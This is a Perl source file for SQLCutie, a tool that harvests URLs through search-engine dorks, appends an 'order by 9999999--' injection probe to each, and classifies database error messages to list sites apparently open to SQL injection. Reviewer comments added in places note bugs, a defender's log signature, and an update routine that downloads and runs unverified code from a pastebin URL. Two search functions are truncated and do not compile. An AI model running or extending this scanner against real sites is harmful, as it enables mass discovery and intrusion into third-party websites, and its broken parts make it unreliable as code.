>#!/usr/bin/perl --
=for comment
*-----------------------------------------------------------*
| |
| SQLCutie 1.2.2 |
| by MadFedora |
| |
| *Faster dorking |
| *Fixed Error Parsing |
| *Update function fixed |
| *Execution fixed |
| *TOR install |
| |
| This is the separated dorker version of SQLCute |
| With accurate vuln finding and wider DB ranges |
| |
| This script is constantly updated, check update |
| function in help menu. |
*-----------------------------------------------------------*
=cut
use LWP::UserAgent;
use HTTP::Request;
use Term::ANSIColor qw(:constants);
#-----------------------------------------------------------#
# Help menu #
#-----------------------------------------------------------#
sub help
{
    # Print the command-line usage banner and terminate the process.
    # The whole banner is emitted as one list so the Term::ANSIColor escape
    # sequences land in exactly the same order as the original per-line prints.
    system('clear');
    system('title SQLCutie 1.2.2');
    my @banner = (
        BLUE, "[!] Usage : $0 \n",
        GREEN, "-----------------------------------",
        BOLD, GREEN, "\n--|| Options\n\n", RESET,
        GREEN, " --dork Dorking function (dorkhelp)\n",
        GREEN, " --proxy Define a proxy to use (proxyhelp)\n",
        " --output Save scan result in an outside file\n",
        " --help Print this help manual\n",
        " --readme README\n",
        " --dorkhelp Print dork help manual\n",
        " --proxyhelp Print proxy help manual\n",
        " --update Update to latest version\n",
        "-----------------------------------\n", RESET,
    );
    print @banner;
    exit();
}
sub readme
{
    # Print the release-notes screen and terminate the process.
    # Text and escape-code order are reproduced exactly; only the middle of
    # the bullet list is generated from an array instead of one print per line.
    system('clear');
    system('title SQLCutie 1.2.2');
    print BOLD, GREEN, " \n SQLCutie ", YELLOW, "1.2.2\n", RESET;
    print "This project was started at ", YELLOW, "09/20/2013\n", RESET;
    print GREEN, "Improvement: \n", RESET;
    my @notes = (
        'Better dork response',
        'More accurated error responses',
        'Better help UI',
        'Update support',
        'Still working on Bing dorking',
    );
    print BLUE, "-- Over 10 types of DB\n";
    print "-- $_\n" for @notes;
    print BOLD, "-- Added TOR installation options\n";
    print "-- Fixed update problem\n", RESET;
    print BOLD, GREEN, "If anyone looking toward to improve this piece of crap\nFeel free to do so!\n", RESET;
    print BLUE, "$0 --help\n\n", RESET;
    exit();
}
sub dorkhelp
{
    # Print the --dork usage examples and terminate the process.
    # The example list is data; the first line carries the GREEN prefix and the
    # last one the RESET, exactly as before.
    system('clear');
    system('title SQLCutie 1.2.2');
    my @examples = (
        'php?id=+ottawa',
        'inurl:php?id=+intitle:ottawa',
        'intext:world+filetype:pl',
        'funny+AND+joyful+asp?id=',
    );
    print GREEN, "\n[?] Example: ./sqlcutie php?id=\n";
    print((map { " ./sqlcutie $_\n" } @examples), RESET);
    print YELLOW, "[!] You can use basically any Google dork query except brackets\n", RESET;
    print BLUE, "$0 --help\n\n", RESET;
    exit();
}
sub proxyhelp
{
    # Print the --proxy usage example and terminate the process.
    # Emitted as a single print list; byte output is unchanged.
    system('clear');
    system('title SQLCutie 1.2.2');
    print GREEN, "\n[?] Example: ./sqlcutie --proxy ", BOLD, "http://127.0.0.1:9050/\n", RESET,
          GREEN, "To install TOR: $0 --tor\n", RESET,
          BLUE, "$0 --help\n\n", RESET;
    exit();
}
sub update
{
# Self-update: removes ./sqlcutie, downloads a replacement from a pastebin raw
# URL over plain HTTP, marks it executable and runs dos2unix on it, all in one
# shell command string.  Nothing verifies what was downloaded — no TLS, no
# checksum or signature — so whoever controls that paste (or the network path
# to it) controls the code executed on the next run; this is a supply-chain
# risk of the tool itself.
# The rm/wget/chmod paths are relative to the current working directory, not
# to the script's own location, and none of the four exit statuses is checked.
system('clear');
system('title SQLCutie 1.2.2');
print GREEN,"\n[!] Updating...\n";
system('rm -r sqlcutie ; wget http://pastebin.com/raw.php?i=NdVZ5HVX -O ./sqlcutie ; chmod u+x ./sqlcutie ; dos2unix ./sqlcutie');
print BOLD,"";
# The message is printed via the shell rather than print; the following print
# only resets the terminal attributes.
system('echo "For what changed run: ./sqlcutie --readme"');
print "\n",RESET;
exit();
}
sub tor
{
# Installs the tor package with `sudo apt-get` and then launches `tor`, both
# through a single shell string; the password prompt mentioned in the banner
# comes from sudo.  Assumes a Debian-style host with apt-get on the PATH.
# NOTE(review): if `tor` stays in the foreground, the usage line below is only
# printed once the daemon exits — confirm on the target platform.
system('clear');
system('title SQLCutie 1.2.2');
print GREEN,BOLD,"\nYou're installing TOR\nPlease enter your user password to proceed or press Ctrl C to exit\n",RESET,BLUE;
system('sudo apt-get install tor && tor');
# `BOLD"..."` is the function-call form of the Term::ANSIColor constant (BOLD
# applied to the string), not a missing comma.
print BOLD"\nTo use: $0 --proxy http://127.0.0.1:9050/ --dork \n",RESET;
exit();
}
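sub variables
{
    # Parse @ARGV into the script's package globals ($search_dork, $vulnfile,
    # $proxy).  Flag-only options dispatch to their help/action sub, each of
    # which exits the process.  The globals are declared with `our` so the
    # assignments are strict-clean while still writing the same package
    # variables the rest of the script reads.
    our ($search_dork, $vulnfile, $proxy);

    # Options that consume the following argument.
    my %target_of = (
        '--dork'   => \$search_dork,
        '--output' => \$vulnfile,
        '--proxy'  => \$proxy,
    );
    # Options that run a sub (all of them exit); plain calls replace the old
    # `&name` form, which would have forwarded the caller's @_.
    my %action_of = (
        '--help'      => \&help,
        '--readme'    => \&readme,
        '--dorkhelp'  => \&dorkhelp,
        '--proxyhelp' => \&proxyhelp,
        '--update'    => \&update,
        '--tor'       => \&tor,
    );

    for my $i (0 .. $#ARGV) {
        my $arg = $ARGV[$i];
        if (exists $target_of{$arg}) {
            # As before, a value-taking option in last position leaves its
            # variable undef; the defined() checks later in the script cover it.
            ${ $target_of{$arg} } = $ARGV[$i + 1];
        }
        elsif (exists $action_of{$arg}) {
            $action_of{$arg}->();
        }
    }
    return;
}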
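sub main
{
    # Clear the terminal and print the program banner followed by the --help
    # hint.  The original guarded the hint with `if (@ARGV+1)`, which is always
    # true (element count plus one is never zero), so the hint is printed
    # unconditionally here — identical behaviour, without the misleading test.
    # If the intent was "only when no arguments were given", that would be
    # `unless (@ARGV)`.
    system('clear');
    # `title` is a Windows console command; elsewhere this system() just fails.
    system('title SQLCutie 1.2.2');
    print GREEN, " \n--------------------------------------\n";
    print BOLD, " \n SQLCutie ", YELLOW, "1.2.2\n", RESET;
    print BLUE, " \n madfedora";
    print " \n madfedora\@mail.riseup.net\n", RESET;
    print GREEN, " \n--------------------------------------\n\n", RESET;
    print GREEN, "[?] For Help : ", BOLD, "$0 --help\n\n", RESET;
}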
sub vulnscanner
{
    # Scan pipeline for the global $search_dork: one warm-up request
    # (checksearch's result is discarded), then the two search back-ends,
    # each of which passes every extracted link to checkvuln.
    my $dork = $search_dork;
    checksearch();
    search1($dork);
    search2($dork);
}
sub checksearch
{
# Warm-up request: fetches page 60 of search-results.com for the global
# $search_dork and reads the body into $result.  The value is the sub's
# implicit return, but vulnscanner() discards it, so nothing here affects
# the scan.
# Review notes (left as-is):
#  - `'A' || 'B' || 'C'` always evaluates to the first literal, so only the
#    first User-Agent string is ever sent;
#  - the response status is never checked before the body is read;
#  - $search_dork is interpolated into the URL without URL-encoding, and
#    $proxy into "http://$proxy/" without validation.
#my $request = HTTP::Request->new(GET => "http://www.google.com/search?hl=en&q=$search_dork&btnG=Search&start=10");
my $request = HTTP::Request->new(GET => "http://www.search-results.com/web?q=$search_dork&s&hl=en&page=60");
#my $request = HTTP::Request->new(GET => "http://www.bing.com/search?q=$search_dork&qs=n&pq=$search_dork&sc=8-5&sp=-1&sk=&first=70");
#-----------------------------------------------------------#
# Change page numbers above #
#-----------------------------------------------------------#
my $useragent = LWP::UserAgent->new(agent => 'Mozilla/5.0 (Windows; U; Windows NT 6.1) AppleWebKit/531.6.2 (KHTML, like Gecko) Version/5.1 Safari/531.6.2' || 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_5 rv:6.0) Gecko/20100731 Firefox/3.6.8' || 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/5.1)');
$useragent->proxy("http", "http://$proxy/") if defined($proxy);
my $response = $useragent->request($request) ;
my $result = $response->content;
}
sub search1
{
# Page through search-results.com and hand each extracted link to checkvuln.
# As posted this sub does not compile: the for-header below is truncated
# (`$i {`), and the while-regex has no capture group, so the $1 it prints and
# passes would always be undef.  The listing is incomplete here; it is
# documented rather than repaired.
# Note: the parameter $dork is unpacked but the request uses the global
# $search_dork instead, and $i is an undeclared package global.
my $dork = $_[0];
for ($i=0;$i {
my $request = HTTP::Request->new(GET => "http://www.search-results.com/web?q=$search_dork&s&hl=en&page=$i");
# Fixed User-Agent string — a stable client fingerprint in server logs.
my $useragent = LWP::UserAgent->new(agent => 'Mozilla/5.0(X11; Linux i686) AppleWebKit/5310 (KHTML, like Gecko) Chrome/13.0.889.0 Safari/5310');
$useragent->proxy("http", "http://$proxy/") if defined($proxy);
# No status check: a failed request yields LWP's own error page as $result.
my $response = $useragent->request($request) ;
my $result = $response->content;
while ($result =~ m/class=r>/g )
{
print BLUE, "[!] Dorking > $1\n", RESET;
checkvuln($1)
}
}
}
sub search2
{
# Page through uk.ask.com for $dork and hand each extracted link to checkvuln.
# As posted this sub does not compile: the for-header below is truncated
# (`$i {`).  The while-regex has a single capture group, so the $3 used to
# build $askurl would always be undef and every URL would be just "http://".
# The listing is incomplete here; it is documented rather than repaired.
# Note: $i is an undeclared package global shared with search1.
my $dork = $_[0];
for ($i=0;$i {
my $request = HTTP::Request->new(GET => "http://uk.ask.com/web?q=$dork&page=$i&dm=all");
my $useragent = LWP::UserAgent->new(agent => 'Mozilla/5.0');
$useragent->proxy("http", "http://$proxy/") if defined($proxy);
# No status check: a failed request yields LWP's own error page as $result.
my $response = $useragent->request($request) ;
my $result = $response->content;
while ($result =~ m/(.*)/gi)
{
my $askurl ="http://".$3 ;
print BLUE, "[!] Dorking > $askurl\n",RESET;
checkvuln($askurl);
}
}
}
sub checkvuln
{
# Fetch $scan_url with the fixed suffix '0+order+by+9999999--' appended and
# classify the response body by the database error strings below.  Each
# branch prints a tag and, when --output was given, appends the URL to one of
# the package-global lists (@mysqlvuln, @mssqlvuln, @accessvuln) that the
# end of the script writes to $vulnfile.
# Review notes (left as-is):
#  - the HTTP status is never checked, so a transport failure is classified
#    from LWP's own error page;
#  - the elsif chain is order-sensitive: the first matching pattern wins;
#  - several patterns contain unescaped regex metacharacters — `()` is an
#    empty group, `.` matches any character, `(HY000)` is a capture group —
#    so they match less literally than they read;
#  - the PostgreSQL, Oracle/JDBC, Sybase and MariaDB branches all push into
#    @mssqlvuln, so the saved file does not separate those engines.
# Defender's note: the appended suffix is a constant string in the query, so
# it is a straightforward signature for web-server log alerting.
my $scan_url = $_[0];
my $link = $scan_url.'0+order+by+9999999--';
my $ua = LWP::UserAgent->new();
$ua->proxy("http", "http://$proxy/") if defined($proxy);
my $req = $ua->get($link);
my $fuzz = $req->content;
#-----------------------------------------------------------#
# MySQL #
#-----------------------------------------------------------#
if ($fuzz =~ m/mysql_num_rows/i || $fuzz =~ m/mysql_numrow/i)
{
print BOLD, GREEN, "[!] MySQL Num Row -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mysqlvuln,"$scan_url\n");
}
}
# `FetchRow()` / `GetArray()`: the parentheses are an empty group, so these
# match the bare function names.
elsif ($fuzz =~ m/mysql_fetch_/i || $fuzz =~ m/mysql_fetch_array/i || $fuzz =~ m/FetchRow()/i|| $fuzz =~ m/GetArray()/i )
{
print BOLD, GREEN, "[!] MySQL Fetch (Array/Row) -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mysqlvuln,"$scan_url\n");
}
}
elsif ($fuzz =~ m/Unexpected EOF found when reading file/i)
{
print BOLD, GREEN, "[!] MySQL EOF -> $scan_url\n", RESET;
print BOLD, WHITE "
[*]Possible Injection\n", RESET;
if (defined($vulnfile))
{
push (@mysqlvuln,"$scan_url\n");
}
}
elsif ($fuzz =~ m/Triggers can not be created on system tables/i)
{
print BOLD, GREEN, "[!] MySQL NO TRIGGERS -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mysqlvuln,"$scan_url\n");
}
}
elsif ($fuzz =~ m/Can't get working directory/i)
{
print BOLD, GREEN, "[!] MySQL Directory -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mysqlvuln,"$scan_url\n");
}
}
elsif ($fuzz =~ m/You have an error in your SQL syntax/i || $fuzz =~ m/Query failed/i || $fuzz =~ m/SQL query failed/i || $fuzz =~ m/The used SELECT statements have a different number of columns/i)
{
print BOLD, GREEN, "[!] MySQL Error Misc -> $scan_url\n", RESET;
print BOLD, WHITE "
[*]Possible Injection\n", RESET;
if (defined($vulnfile))
{
push (@mysqlvuln,"$scan_url\n");
}
}
#-----------------------------------------------------------#
# Microsoft OLE/ODBC/JET [MsSQL/Access] #
#-----------------------------------------------------------#
elsif ($fuzz =~ m/ODBC SQL Server Driver/i || $fuzz =~ m/ODBC Microsoft Access Driver/i || $fuzz =~ m/OLE DB Provider for ODBC/i)
{
print BOLD, GREEN, "[!] Microsoft ODBC [Access] -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@accessvuln,"$scan_url\n");
}
}
elsif ($fuzz =~ m/Microsoft OLE DB Provider for SQL Server/i || $fuzz =~ m/Unclosed quotation mark/i)
{
print BOLD, GREEN, "[!] Microsoft OLE DB [MsSQL] -> $scan_url\n", RESET;
print BOLD, WHITE "
[*]Possible Injection\n", RESET;
if (defined($vulnfile))
{
push (@mssqlvuln,"$scan_url\n");
}
}
# Tagged "Not Injectable" on screen, yet still appended to the output file.
elsif ($fuzz =~ m/VBScript Runtime/i)
{
print BOLD, GREEN, "[!] VBScript Runtime -> $scan_url\n", RESET;
print BOLD, YELLOW "
[*]Not Injectable\n", RESET;
if (defined($vulnfile))
{
push (@mssqlvuln,"$scan_url\n");
}
}
elsif ($fuzz =~ m/Microsoft JET Database/i)
{
print BOLD, GREEN, "[!] Microsoft JET [Access] -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@accessvuln,"$scan_url\n");
}
}
#-----------------------------------------------------------#
# ADO DB #
#-----------------------------------------------------------#
elsif ($fuzz =~ m/Invalid Querystring/i)
{
print BOLD, GREEN, "[!] ADO DB Invalid Querystring -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mssqlvuln,"$scan_url\n");
}
}
# Unescaped `.` in the next two patterns matches any character.
elsif ($fuzz =~ m/ADODB.Field/i)
{
print BOLD, GREEN, "[!] ADO DB ADODB.Field -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mssqlvuln,"$scan_url\n");
}
}
elsif ($fuzz =~ m/ADODB.Command/i )
{
print BOLD, GREEN, "[!] ADO DB ADODB.Command -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mssqlvuln,"$scan_url\n");
}
}
elsif ($fuzz =~ m/BOF or EOF/i)
{
print BOLD, GREEN, "[!] ADO DB BOF or EOF -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mssqlvuln,"$scan_url\n");
}
}
#-----------------------------------------------------------#
# PostgreSQL #
#-----------------------------------------------------------#
elsif ($fuzz =~ m/postgresql.util/i || $fuzz =~ m/psql: could not connect to server/i || $fuzz =~ m/psql: FATAL/i || $fuzz =~ m/dynamic_result_sets_returned/i || $fuzz =~ m/null_value_eliminated_in_set_function/i || $fuzz =~ m/ERROR: invalid input syntax for integer/i )
{
print BOLD, GREEN, "[!] PosgreSQL -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mssqlvuln,"$scan_url\n");
}
}
#-----------------------------------------------------------#
# Oracle #
#-----------------------------------------------------------#
elsif ($fuzz =~ m/oracle.jdbc/i || $fuzz =~ m/system.data.oledb/i )
{
print BOLD, GREEN, "[!] JDBC -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mssqlvuln,"$scan_url\n");
}
}
#-----------------------------------------------------------#
# Sybase #
#-----------------------------------------------------------#
elsif ($fuzz =~ m/Warning: sybase_query()/i || $fuzz =~ m/sybase_fetch_assoc()/i )
{
print BOLD, GREEN, "[!] Sybase -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mssqlvuln,"$scan_url\n");
}
}
#-----------------------------------------------------------#
# MariaDB #
#-----------------------------------------------------------#
# `(HY000)` is a capture group here, so this matches "ERROR 1712 HY000"
# rather than the parenthesised text.
elsif ($fuzz =~ m/ERROR 1712 (HY000)/i )
{
print BOLD, GREEN, "[!] MariaDB Index Corruption -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mssqlvuln,"$scan_url\n");
}
}
elsif ($fuzz =~ m/ER_QUERY_EXCEEDED_ROWS_EXAMINED_LIMIT/i )
{
print BOLD, GREEN, "[!] MariaDB Query Excecution Corrupted -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mssqlvuln,"$scan_url\n");
}
}
elsif ($fuzz =~ m/ER_QUERY_CACHE_IS_GLOBALY_DISABLED/i )
{
print BOLD, GREEN, "[!] MariaDB Query cache is globally disabled -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mssqlvuln,"$scan_url\n");
}
}
elsif ($fuzz =~ m/ER_DYN_COL_IMPLEMENTATION_LIMIT/i )
{
print BOLD, GREEN, "[!] MariaDB Dynamic column implementation limit -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mssqlvuln,"$scan_url\n");
}
}
}
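# Entry point: parse options, show the banner, then scan if --dork was given.
variables();
main();
if (defined($search_dork))
{
    print BOLD, GREEN, "[+] Vulnerability Scan\n";
    print "[+] Dork : $search_dork\n\n\n", RESET;
    vulnscanner();
    if (defined($vulnfile))
    {
        # Three-argument open with a lexical handle: the user-supplied path
        # can no longer be read as a mode prefix, and a failed open is
        # reported instead of silently discarding the results and then
        # claiming they were saved.  close() is checked because buffered
        # write errors only surface there.
        open(my $vuln_fh, '>>', $vulnfile)
            or die "[!] Cannot open $vulnfile for append: $!\n";
        print {$vuln_fh} @mysqlvuln, @mssqlvuln, @accessvuln;
        close($vuln_fh)
            or die "[!] Error writing $vulnfile: $!\n";
        print YELLOW, "[+] Result Saved to $vulnfile\n", RESET;
        exit();
    }
}
else
{
    # This hint used to sit after exit() inside the --output branch, where it
    # could never run; it now fires when no --dork value was supplied.  The
    # similarly unreachable "enter the correct proxy" check was dropped:
    # --proxy is optional everywhere else in the script.
    print YELLOW, "[!] Please enter the correct query, example ", BOLD, "inurl:php?id=+world\n", RESET;
    exit();
}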
#-----------------------------------------------------------#
# End #
#-----------------------------------------------------------#